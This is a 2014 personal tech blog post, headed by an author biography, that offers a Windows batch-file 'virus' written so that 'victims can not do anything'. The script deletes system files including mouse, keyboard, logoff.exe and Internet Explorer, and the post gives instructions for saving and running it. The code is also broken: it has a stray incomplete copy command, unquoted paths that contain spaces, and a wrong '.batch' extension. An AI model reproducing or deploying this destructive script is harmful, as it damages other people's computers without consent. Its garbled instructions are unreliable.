About Me

ABOUT Greetings, Thanks for visiting techmindug.blogspot.com I am Opendi Cornelius Founder , CEO and Author of this blog. I work as an Application and Web Based Programmer in my spare time. Connect With Me On : • Facebook • Google+ • Twitter • LinkedIn The genesis behind techmindug.blogspot.com is my passion for anything even remotely related with technology. My areas of interest include Blogging, Technology, Computer Systems, Gadgets, SEO (Search Engine Optimization) , WordPress, Programming, Software Reviews and of course, surfing the net all the time. Techmindug.blogspot.com is a Blog Site where I write on the above mentioned areas of interest. Please feel free to share your valuable suggestions to enrich this blog. I am much thankful for your visit and I look forward to your visit again. If you face any issues , please send me your feedback through the Contact Form. Regards, Opendi Cornelius

Monday, 23 June 2014

Virus to Delete mouse,explore,logoff using Batch Programming



I usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer.

@echo off

@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

To create batch programming file you will need to copy that file give it a name and save as .batch (take note of the dot before the word batch)

0 comments:

Post a Comment